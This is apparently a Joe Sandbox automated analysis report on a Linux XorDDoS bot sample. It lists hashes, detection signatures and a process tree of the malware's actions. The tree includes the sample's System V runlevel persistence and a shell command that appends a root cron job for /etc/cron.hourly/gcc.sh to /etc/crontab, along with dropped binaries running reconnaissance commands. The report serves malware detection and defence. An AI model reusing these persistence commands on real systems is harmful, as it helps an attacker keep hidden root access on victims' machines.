Edit tour

Linux Analysis Report
dptxrnhxmx.elf

Overview

General Information

Sample Name:	dptxrnhxmx.elf
Analysis ID:	1333863
MD5:	85682d3effdb2d559fd84df491e9461a
SHA1:	2fb53f36a77339e1dd8458dd3fe561355de76211
SHA256:	3a8a11b60fd8e2f93d29fb46cdda68fd404b06147a7c717d3619b088e39875ba
Tags:	elfxorddos
Infos:

Detection

XorDDoS

Score:	100
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Antivirus detection for dropped file

Yara detected XorDDoS Bot

Sample tries to persist itself using System V runlevels

Machine Learning detection for dropped file

Sample tries to persist itself using cron

Drops files in suspicious directories

Sample deletes itself

Machine Learning detection for sample

Writes ELF files to disk

Yara signature match

Drops files with innocent-looking names

PID-file does not contain an ASCII number

Writes shell script files to disk

Reads system information from the proc file system

Uses the "uname" system call to query kernel version information (possible evasion)

Executes the "systemctl" command used for controlling the systemd system and service manager

Executes commands using a shell command-line interpreter

Sample and/or dropped files contains symbols with suspicious names

Reads CPU information from /proc indicative of miner or evasive malware

Writes shell script file to disk with an unusual file extension

Classification

General Information

Joe Sandbox Version:	38.0.0 Ammolite
Analysis ID:	1333863
Start date and time:	2023-10-29 16:51:06 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 2s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample file name:	dptxrnhxmx.elf
Detection:	MAL
Classification:	mal100.troj.evad.linELF@0/19@0/0

Warnings

Skipping network analysis since amount of network traffic is too extensive

Runtime Messages

Command:	/tmp/dptxrnhxmx.elf
PID:	6208
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:
Standard Error:

Process Tree

system is lnxubuntu20

dptxrnhxmx.elf (PID: 6208, Parent: 6123, MD5: 85682d3effdb2d559fd84df491e9461a) Arguments: /tmp/dptxrnhxmx.elf

dptxrnhxmx.elf New Fork (PID: 6209, Parent: 6208)

dptxrnhxmx.elf New Fork (PID: 6210, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6211, Parent: 6210)

dptxrnhxmx.elf New Fork (PID: 6212, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6213, Parent: 6212)

update-rc.d (PID: 6213, Parent: 1860, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: update-rc.d dptxrnhxmx.elf defaults

update-rc.d New Fork (PID: 6219, Parent: 6213)

systemctl (PID: 6219, Parent: 6213, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload

dptxrnhxmx.elf New Fork (PID: 6214, Parent: 6209)

sh (PID: 6214, Parent: 6209, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "sed -i '/\\/etc\\/cron.hourly\\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab"

sh New Fork (PID: 6215, Parent: 6214)

sed (PID: 6215, Parent: 6214, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -i /\\/etc\\/cron.hourly\\/gcc.sh/d /etc/crontab

dptxrnhxmx.elf New Fork (PID: 6243, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6244, Parent: 6243)

qabtuykfdb (PID: 6244, Parent: 6243, MD5: cfc60e87b79b9fda780d09582c8ffd8a) Arguments: /usr/bin/qabtuykfdb sh 6209

qabtuykfdb New Fork (PID: 6245, Parent: 6244)

dptxrnhxmx.elf New Fork (PID: 6246, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6247, Parent: 6246)

qabtuykfdb (PID: 6247, Parent: 6246, MD5: cfc60e87b79b9fda780d09582c8ffd8a) Arguments: /usr/bin/qabtuykfdb uptime 6209

qabtuykfdb New Fork (PID: 6250, Parent: 6247)

dptxrnhxmx.elf New Fork (PID: 6248, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6249, Parent: 6248)

qabtuykfdb (PID: 6249, Parent: 6248, MD5: cfc60e87b79b9fda780d09582c8ffd8a) Arguments: /usr/bin/qabtuykfdb "netstat -an" 6209

qabtuykfdb New Fork (PID: 6253, Parent: 6249)

dptxrnhxmx.elf New Fork (PID: 6251, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6252, Parent: 6251)

qabtuykfdb (PID: 6252, Parent: 6251, MD5: cfc60e87b79b9fda780d09582c8ffd8a) Arguments: /usr/bin/qabtuykfdb id 6209

qabtuykfdb New Fork (PID: 6256, Parent: 6252)

dptxrnhxmx.elf New Fork (PID: 6254, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6255, Parent: 6254)

qabtuykfdb (PID: 6255, Parent: 6254, MD5: cfc60e87b79b9fda780d09582c8ffd8a) Arguments: /usr/bin/qabtuykfdb "netstat -an" 6209

qabtuykfdb New Fork (PID: 6257, Parent: 6255)

dptxrnhxmx.elf New Fork (PID: 6298, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6299, Parent: 6298)

wrvptdarnp (PID: 6299, Parent: 6298, MD5: ddf045010b43b44731521349ab7be7b9) Arguments: /usr/bin/wrvptdarnp pwd 6209

wrvptdarnp New Fork (PID: 6300, Parent: 6299)

dptxrnhxmx.elf New Fork (PID: 6301, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6302, Parent: 6301)

wrvptdarnp (PID: 6302, Parent: 6301, MD5: ddf045010b43b44731521349ab7be7b9) Arguments: /usr/bin/wrvptdarnp top 6209

wrvptdarnp New Fork (PID: 6303, Parent: 6302)

dptxrnhxmx.elf New Fork (PID: 6304, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6305, Parent: 6304)

wrvptdarnp (PID: 6305, Parent: 6304, MD5: ddf045010b43b44731521349ab7be7b9) Arguments: /usr/bin/wrvptdarnp "ifconfig eth0" 6209

wrvptdarnp New Fork (PID: 6306, Parent: 6305)

dptxrnhxmx.elf New Fork (PID: 6307, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6308, Parent: 6307)

wrvptdarnp (PID: 6308, Parent: 6307, MD5: ddf045010b43b44731521349ab7be7b9) Arguments: /usr/bin/wrvptdarnp "netstat -an" 6209

wrvptdarnp New Fork (PID: 6311, Parent: 6308)

dptxrnhxmx.elf New Fork (PID: 6309, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6310, Parent: 6309)

wrvptdarnp (PID: 6310, Parent: 6309, MD5: ddf045010b43b44731521349ab7be7b9) Arguments: /usr/bin/wrvptdarnp sh 6209

wrvptdarnp New Fork (PID: 6312, Parent: 6310)

dptxrnhxmx.elf New Fork (PID: 6316, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6317, Parent: 6316)

mbeioyodii (PID: 6317, Parent: 6316, MD5: 25bbb89787f3d46fd40211220f087144) Arguments: /usr/bin/mbeioyodii uptime 6209

mbeioyodii New Fork (PID: 6318, Parent: 6317)

dptxrnhxmx.elf New Fork (PID: 6319, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6320, Parent: 6319)

mbeioyodii (PID: 6320, Parent: 6319, MD5: 25bbb89787f3d46fd40211220f087144) Arguments: /usr/bin/mbeioyodii "grep \"A\"" 6209

mbeioyodii New Fork (PID: 6321, Parent: 6320)

dptxrnhxmx.elf New Fork (PID: 6322, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6323, Parent: 6322)

mbeioyodii (PID: 6323, Parent: 6322, MD5: 25bbb89787f3d46fd40211220f087144) Arguments: /usr/bin/mbeioyodii uptime 6209

mbeioyodii New Fork (PID: 6324, Parent: 6323)

dptxrnhxmx.elf New Fork (PID: 6325, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6326, Parent: 6325)

mbeioyodii (PID: 6326, Parent: 6325, MD5: 25bbb89787f3d46fd40211220f087144) Arguments: /usr/bin/mbeioyodii uptime 6209

mbeioyodii New Fork (PID: 6329, Parent: 6326)

dptxrnhxmx.elf New Fork (PID: 6327, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6328, Parent: 6327)

mbeioyodii (PID: 6328, Parent: 6327, MD5: 25bbb89787f3d46fd40211220f087144) Arguments: /usr/bin/mbeioyodii id 6209

mbeioyodii New Fork (PID: 6332, Parent: 6328)

dptxrnhxmx.elf New Fork (PID: 6337, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6338, Parent: 6337)

wobaryykiz (PID: 6338, Parent: 6337, MD5: f82e5b84c6eee7c90e56ee733682e625) Arguments: /usr/bin/wobaryykiz ifconfig 6209

wobaryykiz New Fork (PID: 6339, Parent: 6338)

dptxrnhxmx.elf New Fork (PID: 6340, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6341, Parent: 6340)

wobaryykiz (PID: 6341, Parent: 6340, MD5: f82e5b84c6eee7c90e56ee733682e625) Arguments: /usr/bin/wobaryykiz ls 6209

wobaryykiz New Fork (PID: 6342, Parent: 6341)

dptxrnhxmx.elf New Fork (PID: 6343, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6344, Parent: 6343)

wobaryykiz (PID: 6344, Parent: 6343, MD5: f82e5b84c6eee7c90e56ee733682e625) Arguments: /usr/bin/wobaryykiz "sleep 1" 6209

wobaryykiz New Fork (PID: 6345, Parent: 6344)

dptxrnhxmx.elf New Fork (PID: 6346, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6347, Parent: 6346)

wobaryykiz (PID: 6347, Parent: 6346, MD5: f82e5b84c6eee7c90e56ee733682e625) Arguments: /usr/bin/wobaryykiz "ls -la" 6209

wobaryykiz New Fork (PID: 6350, Parent: 6347)

dptxrnhxmx.elf New Fork (PID: 6348, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6349, Parent: 6348)

wobaryykiz (PID: 6349, Parent: 6348, MD5: f82e5b84c6eee7c90e56ee733682e625) Arguments: /usr/bin/wobaryykiz "netstat -antop" 6209

wobaryykiz New Fork (PID: 6351, Parent: 6349)

dptxrnhxmx.elf New Fork (PID: 6354, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6355, Parent: 6354)

rhlqbltizb (PID: 6355, Parent: 6354, MD5: fd558e890aac97ebdd84c36af046ce6a) Arguments: /usr/bin/rhlqbltizb "cat resolv.conf" 6209

rhlqbltizb New Fork (PID: 6356, Parent: 6355)

dptxrnhxmx.elf New Fork (PID: 6357, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6358, Parent: 6357)

rhlqbltizb (PID: 6358, Parent: 6357, MD5: fd558e890aac97ebdd84c36af046ce6a) Arguments: /usr/bin/rhlqbltizb whoami 6209

rhlqbltizb New Fork (PID: 6361, Parent: 6358)

dptxrnhxmx.elf New Fork (PID: 6359, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6360, Parent: 6359)

rhlqbltizb (PID: 6360, Parent: 6359, MD5: fd558e890aac97ebdd84c36af046ce6a) Arguments: /usr/bin/rhlqbltizb "ls -la" 6209

rhlqbltizb New Fork (PID: 6364, Parent: 6360)

dptxrnhxmx.elf New Fork (PID: 6362, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6363, Parent: 6362)

rhlqbltizb (PID: 6363, Parent: 6362, MD5: fd558e890aac97ebdd84c36af046ce6a) Arguments: /usr/bin/rhlqbltizb "route -n" 6209

rhlqbltizb New Fork (PID: 6367, Parent: 6363)

dptxrnhxmx.elf New Fork (PID: 6365, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6366, Parent: 6365)

rhlqbltizb (PID: 6366, Parent: 6365, MD5: fd558e890aac97ebdd84c36af046ce6a) Arguments: /usr/bin/rhlqbltizb "echo \"find\"" 6209

rhlqbltizb New Fork (PID: 6368, Parent: 6366)

dptxrnhxmx.elf New Fork (PID: 6371, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6372, Parent: 6371)

gcfolkfaec (PID: 6372, Parent: 6371, MD5: 0f3620128a01d72dead621566854b259) Arguments: /usr/bin/gcfolkfaec pwd 6209

gcfolkfaec New Fork (PID: 6373, Parent: 6372)

dptxrnhxmx.elf New Fork (PID: 6374, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6375, Parent: 6374)

gcfolkfaec (PID: 6375, Parent: 6374, MD5: 0f3620128a01d72dead621566854b259) Arguments: /usr/bin/gcfolkfaec whoami 6209

gcfolkfaec New Fork (PID: 6376, Parent: 6375)

dptxrnhxmx.elf New Fork (PID: 6377, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6378, Parent: 6377)

gcfolkfaec (PID: 6378, Parent: 6377, MD5: 0f3620128a01d72dead621566854b259) Arguments: /usr/bin/gcfolkfaec ifconfig 6209

gcfolkfaec New Fork (PID: 6379, Parent: 6378)

dptxrnhxmx.elf New Fork (PID: 6380, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6381, Parent: 6380)

gcfolkfaec (PID: 6381, Parent: 6380, MD5: 0f3620128a01d72dead621566854b259) Arguments: /usr/bin/gcfolkfaec sh 6209

gcfolkfaec New Fork (PID: 6382, Parent: 6381)

dptxrnhxmx.elf New Fork (PID: 6383, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6384, Parent: 6383)

gcfolkfaec (PID: 6384, Parent: 6383, MD5: 0f3620128a01d72dead621566854b259) Arguments: /usr/bin/gcfolkfaec "ifconfig eth0" 6209

gcfolkfaec New Fork (PID: 6385, Parent: 6384)

dptxrnhxmx.elf New Fork (PID: 6388, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6389, Parent: 6388)

scllcnzpeu (PID: 6389, Parent: 6388, MD5: 8ab8f35c125242672f1fdcbf9821815c) Arguments: /usr/bin/scllcnzpeu "ls -la" 6209

scllcnzpeu New Fork (PID: 6390, Parent: 6389)

dptxrnhxmx.elf New Fork (PID: 6391, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6392, Parent: 6391)

scllcnzpeu (PID: 6392, Parent: 6391, MD5: 8ab8f35c125242672f1fdcbf9821815c) Arguments: /usr/bin/scllcnzpeu bash 6209

scllcnzpeu New Fork (PID: 6393, Parent: 6392)

dptxrnhxmx.elf New Fork (PID: 6394, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6395, Parent: 6394)

scllcnzpeu (PID: 6395, Parent: 6394, MD5: 8ab8f35c125242672f1fdcbf9821815c) Arguments: /usr/bin/scllcnzpeu "grep \"A\"" 6209

scllcnzpeu New Fork (PID: 6396, Parent: 6395)

dptxrnhxmx.elf New Fork (PID: 6397, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6398, Parent: 6397)

scllcnzpeu (PID: 6398, Parent: 6397, MD5: 8ab8f35c125242672f1fdcbf9821815c) Arguments: /usr/bin/scllcnzpeu "cat resolv.conf" 6209

scllcnzpeu New Fork (PID: 6399, Parent: 6398)

dptxrnhxmx.elf New Fork (PID: 6400, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6401, Parent: 6400)

scllcnzpeu (PID: 6401, Parent: 6400, MD5: 8ab8f35c125242672f1fdcbf9821815c) Arguments: /usr/bin/scllcnzpeu who 6209

scllcnzpeu New Fork (PID: 6402, Parent: 6401)

dptxrnhxmx.elf New Fork (PID: 6406, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6407, Parent: 6406)

tgdthymawi (PID: 6407, Parent: 6406, MD5: 44b0b9a89834d2fcf626817cb38d28b6) Arguments: /usr/bin/tgdthymawi "netstat -an" 6209

tgdthymawi New Fork (PID: 6408, Parent: 6407)

dptxrnhxmx.elf New Fork (PID: 6409, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6410, Parent: 6409)

tgdthymawi (PID: 6410, Parent: 6409, MD5: 44b0b9a89834d2fcf626817cb38d28b6) Arguments: /usr/bin/tgdthymawi gnome-terminal 6209

tgdthymawi New Fork (PID: 6411, Parent: 6410)

dptxrnhxmx.elf New Fork (PID: 6414, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6415, Parent: 6414)

tgdthymawi (PID: 6415, Parent: 6414, MD5: 44b0b9a89834d2fcf626817cb38d28b6) Arguments: /usr/bin/tgdthymawi "ifconfig eth0" 6209

tgdthymawi New Fork (PID: 6416, Parent: 6415)

dptxrnhxmx.elf New Fork (PID: 6417, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6418, Parent: 6417)

tgdthymawi (PID: 6418, Parent: 6417, MD5: 44b0b9a89834d2fcf626817cb38d28b6) Arguments: /usr/bin/tgdthymawi "cd /etc" 6209

tgdthymawi New Fork (PID: 6420, Parent: 6418)

dptxrnhxmx.elf New Fork (PID: 6419, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6421, Parent: 6419)

tgdthymawi (PID: 6421, Parent: 1860, MD5: 44b0b9a89834d2fcf626817cb38d28b6) Arguments: /usr/bin/tgdthymawi "sleep 1" 6209

tgdthymawi New Fork (PID: 6422, Parent: 6421)

dptxrnhxmx.elf New Fork (PID: 6425, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6426, Parent: 6425)

drdxrfohux (PID: 6426, Parent: 6425, MD5: fae507cacb8ef11ece2641d2443b133c) Arguments: /usr/bin/drdxrfohux "ps -ef" 6209

drdxrfohux New Fork (PID: 6429, Parent: 6426)

dptxrnhxmx.elf New Fork (PID: 6427, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6428, Parent: 6427)

drdxrfohux (PID: 6428, Parent: 1860, MD5: fae507cacb8ef11ece2641d2443b133c) Arguments: /usr/bin/drdxrfohux "netstat -antop" 6209

drdxrfohux New Fork (PID: 6433, Parent: 6428)

dptxrnhxmx.elf New Fork (PID: 6430, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6431, Parent: 6430)

drdxrfohux (PID: 6431, Parent: 1860, MD5: fae507cacb8ef11ece2641d2443b133c) Arguments: /usr/bin/drdxrfohux "ps -ef" 6209

drdxrfohux New Fork (PID: 6437, Parent: 6431)

dptxrnhxmx.elf New Fork (PID: 6432, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6434, Parent: 6432)

drdxrfohux (PID: 6434, Parent: 1860, MD5: fae507cacb8ef11ece2641d2443b133c) Arguments: /usr/bin/drdxrfohux ls 6209

drdxrfohux New Fork (PID: 6438, Parent: 6434)

dptxrnhxmx.elf New Fork (PID: 6435, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6436, Parent: 6435)

drdxrfohux (PID: 6436, Parent: 1860, MD5: fae507cacb8ef11ece2641d2443b133c) Arguments: /usr/bin/drdxrfohux "echo \"find\"" 6209

drdxrfohux New Fork (PID: 6439, Parent: 6436)

dptxrnhxmx.elf New Fork (PID: 6442, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6443, Parent: 6442)

doxgrgkpoa (PID: 6443, Parent: 6442, MD5: 554e86fe72f87ddbdc34820e327d739c) Arguments: /usr/bin/doxgrgkpoa "grep \"A\"" 6209

doxgrgkpoa New Fork (PID: 6447, Parent: 6443)

dptxrnhxmx.elf New Fork (PID: 6444, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6445, Parent: 6444)

doxgrgkpoa (PID: 6445, Parent: 1860, MD5: 554e86fe72f87ddbdc34820e327d739c) Arguments: /usr/bin/doxgrgkpoa top 6209

doxgrgkpoa New Fork (PID: 6451, Parent: 6445)

dptxrnhxmx.elf New Fork (PID: 6446, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6448, Parent: 6446)

doxgrgkpoa (PID: 6448, Parent: 1860, MD5: 554e86fe72f87ddbdc34820e327d739c) Arguments: /usr/bin/doxgrgkpoa "ifconfig eth0" 6209

doxgrgkpoa New Fork (PID: 6453, Parent: 6448)

dptxrnhxmx.elf New Fork (PID: 6449, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6450, Parent: 6449)

doxgrgkpoa (PID: 6450, Parent: 1860, MD5: 554e86fe72f87ddbdc34820e327d739c) Arguments: /usr/bin/doxgrgkpoa "route -n" 6209

doxgrgkpoa New Fork (PID: 6455, Parent: 6450)

dptxrnhxmx.elf New Fork (PID: 6452, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6454, Parent: 6452)

doxgrgkpoa (PID: 6454, Parent: 1860, MD5: 554e86fe72f87ddbdc34820e327d739c) Arguments: /usr/bin/doxgrgkpoa sh 6209

doxgrgkpoa New Fork (PID: 6456, Parent: 6454)

dptxrnhxmx.elf New Fork (PID: 6459, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6460, Parent: 6459)

mntlutgnfs (PID: 6460, Parent: 6459, MD5: 7087cda9340637572e5b22d072b11ffb) Arguments: /usr/bin/mntlutgnfs "echo \"find\"" 6209

mntlutgnfs New Fork (PID: 6463, Parent: 6460)

dptxrnhxmx.elf New Fork (PID: 6461, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6462, Parent: 6461)

mntlutgnfs (PID: 6462, Parent: 1860, MD5: 7087cda9340637572e5b22d072b11ffb) Arguments: /usr/bin/mntlutgnfs "cat resolv.conf" 6209

mntlutgnfs New Fork (PID: 6467, Parent: 6462)

dptxrnhxmx.elf New Fork (PID: 6464, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6465, Parent: 6464)

mntlutgnfs (PID: 6465, Parent: 1860, MD5: 7087cda9340637572e5b22d072b11ffb) Arguments: /usr/bin/mntlutgnfs "ifconfig eth0" 6209

mntlutgnfs New Fork (PID: 6471, Parent: 6465)

dptxrnhxmx.elf New Fork (PID: 6466, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6468, Parent: 6466)

mntlutgnfs (PID: 6468, Parent: 1860, MD5: 7087cda9340637572e5b22d072b11ffb) Arguments: /usr/bin/mntlutgnfs "cat resolv.conf" 6209

mntlutgnfs New Fork (PID: 6472, Parent: 6468)

dptxrnhxmx.elf New Fork (PID: 6469, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6470, Parent: 6469)

mntlutgnfs (PID: 6470, Parent: 1860, MD5: 7087cda9340637572e5b22d072b11ffb) Arguments: /usr/bin/mntlutgnfs "ls -la" 6209

mntlutgnfs New Fork (PID: 6473, Parent: 6470)

dptxrnhxmx.elf New Fork (PID: 6477, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6478, Parent: 6477)

zfzhrlhjxr (PID: 6478, Parent: 6477, MD5: c8a82c85ddea45f8cfbb9b1637defa4f) Arguments: /usr/bin/zfzhrlhjxr "sleep 1" 6209

zfzhrlhjxr New Fork (PID: 6481, Parent: 6478)

dptxrnhxmx.elf New Fork (PID: 6479, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6480, Parent: 6479)

zfzhrlhjxr (PID: 6480, Parent: 1860, MD5: c8a82c85ddea45f8cfbb9b1637defa4f) Arguments: /usr/bin/zfzhrlhjxr "netstat -an" 6209

zfzhrlhjxr New Fork (PID: 6486, Parent: 6480)

dptxrnhxmx.elf New Fork (PID: 6482, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6483, Parent: 6482)

zfzhrlhjxr (PID: 6483, Parent: 1860, MD5: c8a82c85ddea45f8cfbb9b1637defa4f) Arguments: /usr/bin/zfzhrlhjxr "grep \"A\"" 6209

zfzhrlhjxr New Fork (PID: 6489, Parent: 6483)

dptxrnhxmx.elf New Fork (PID: 6484, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6485, Parent: 6484)

zfzhrlhjxr (PID: 6485, Parent: 1860, MD5: c8a82c85ddea45f8cfbb9b1637defa4f) Arguments: /usr/bin/zfzhrlhjxr uptime 6209

zfzhrlhjxr New Fork (PID: 6490, Parent: 6485)

dptxrnhxmx.elf New Fork (PID: 6487, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6488, Parent: 6487)

zfzhrlhjxr (PID: 6488, Parent: 1860, MD5: c8a82c85ddea45f8cfbb9b1637defa4f) Arguments: /usr/bin/zfzhrlhjxr "sleep 1" 6209

zfzhrlhjxr New Fork (PID: 6491, Parent: 6488)

dptxrnhxmx.elf New Fork (PID: 6494, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6495, Parent: 6494)

tqdlzqtrvv (PID: 6495, Parent: 6494, MD5: 08eefc1ac5b84248b8feded042945b0b) Arguments: /usr/bin/tqdlzqtrvv "echo \"find\"" 6209

tqdlzqtrvv New Fork (PID: 6498, Parent: 6495)

dptxrnhxmx.elf New Fork (PID: 6496, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6497, Parent: 6496)

tqdlzqtrvv (PID: 6497, Parent: 1860, MD5: 08eefc1ac5b84248b8feded042945b0b) Arguments: /usr/bin/tqdlzqtrvv top 6209

tqdlzqtrvv New Fork (PID: 6502, Parent: 6497)

dptxrnhxmx.elf New Fork (PID: 6499, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6500, Parent: 6499)

tqdlzqtrvv (PID: 6500, Parent: 6499, MD5: 08eefc1ac5b84248b8feded042945b0b) Arguments: /usr/bin/tqdlzqtrvv "ls -la" 6209

tqdlzqtrvv New Fork (PID: 6504, Parent: 6500)

dptxrnhxmx.elf New Fork (PID: 6501, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6503, Parent: 6501)

tqdlzqtrvv (PID: 6503, Parent: 1860, MD5: 08eefc1ac5b84248b8feded042945b0b) Arguments: /usr/bin/tqdlzqtrvv "grep \"A\"" 6209

tqdlzqtrvv New Fork (PID: 6507, Parent: 6503)

dptxrnhxmx.elf New Fork (PID: 6505, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6506, Parent: 6505)

tqdlzqtrvv (PID: 6506, Parent: 1860, MD5: 08eefc1ac5b84248b8feded042945b0b) Arguments: /usr/bin/tqdlzqtrvv "cat resolv.conf" 6209

tqdlzqtrvv New Fork (PID: 6508, Parent: 6506)

dptxrnhxmx.elf New Fork (PID: 6514, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6515, Parent: 6514)

vigcpbezza (PID: 6515, Parent: 6514, MD5: 9bbb510e2c2ffad6381fa18d91e42ba7) Arguments: /usr/bin/vigcpbezza uptime 6209

vigcpbezza New Fork (PID: 6518, Parent: 6515)

dptxrnhxmx.elf New Fork (PID: 6516, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6517, Parent: 6516)

vigcpbezza (PID: 6517, Parent: 1860, MD5: 9bbb510e2c2ffad6381fa18d91e42ba7) Arguments: /usr/bin/vigcpbezza "route -n" 6209

vigcpbezza New Fork (PID: 6521, Parent: 6517)

dptxrnhxmx.elf New Fork (PID: 6519, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6520, Parent: 6519)

vigcpbezza (PID: 6520, Parent: 1860, MD5: 9bbb510e2c2ffad6381fa18d91e42ba7) Arguments: /usr/bin/vigcpbezza "cd /etc" 6209

vigcpbezza New Fork (PID: 6524, Parent: 6520)

dptxrnhxmx.elf New Fork (PID: 6522, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6523, Parent: 6522)

vigcpbezza (PID: 6523, Parent: 1860, MD5: 9bbb510e2c2ffad6381fa18d91e42ba7) Arguments: /usr/bin/vigcpbezza "cat resolv.conf" 6209

vigcpbezza New Fork (PID: 6527, Parent: 6523)

dptxrnhxmx.elf New Fork (PID: 6525, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6526, Parent: 6525)

vigcpbezza (PID: 6526, Parent: 1860, MD5: 9bbb510e2c2ffad6381fa18d91e42ba7) Arguments: /usr/bin/vigcpbezza "echo \"find\"" 6209

vigcpbezza New Fork (PID: 6528, Parent: 6526)

dptxrnhxmx.elf New Fork (PID: 6531, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6532, Parent: 6531)

nffvpfovhi (PID: 6532, Parent: 6531, MD5: 376e3879c431923310565c72297302cc) Arguments: /usr/bin/nffvpfovhi "cat resolv.conf" 6209

nffvpfovhi New Fork (PID: 6535, Parent: 6532)

dptxrnhxmx.elf New Fork (PID: 6533, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6534, Parent: 6533)

nffvpfovhi (PID: 6534, Parent: 1860, MD5: 376e3879c431923310565c72297302cc) Arguments: /usr/bin/nffvpfovhi "grep \"A\"" 6209

nffvpfovhi New Fork (PID: 6539, Parent: 6534)

dptxrnhxmx.elf New Fork (PID: 6536, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6537, Parent: 6536)

nffvpfovhi (PID: 6537, Parent: 1860, MD5: 376e3879c431923310565c72297302cc) Arguments: /usr/bin/nffvpfovhi id 6209

nffvpfovhi New Fork (PID: 6542, Parent: 6537)

dptxrnhxmx.elf New Fork (PID: 6538, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6540, Parent: 6538)

nffvpfovhi (PID: 6540, Parent: 1860, MD5: 376e3879c431923310565c72297302cc) Arguments: /usr/bin/nffvpfovhi "ls -la" 6209

nffvpfovhi New Fork (PID: 6544, Parent: 6540)

dptxrnhxmx.elf New Fork (PID: 6541, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6543, Parent: 6541)

nffvpfovhi (PID: 6543, Parent: 1860, MD5: 376e3879c431923310565c72297302cc) Arguments: /usr/bin/nffvpfovhi uptime 6209

nffvpfovhi New Fork (PID: 6545, Parent: 6543)

dptxrnhxmx.elf New Fork (PID: 6548, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6549, Parent: 6548)

zvrtnapfcs (PID: 6549, Parent: 6548, MD5: 42da71a26ad9caa22fb437fcddc63a02) Arguments: /usr/bin/zvrtnapfcs gnome-terminal 6209

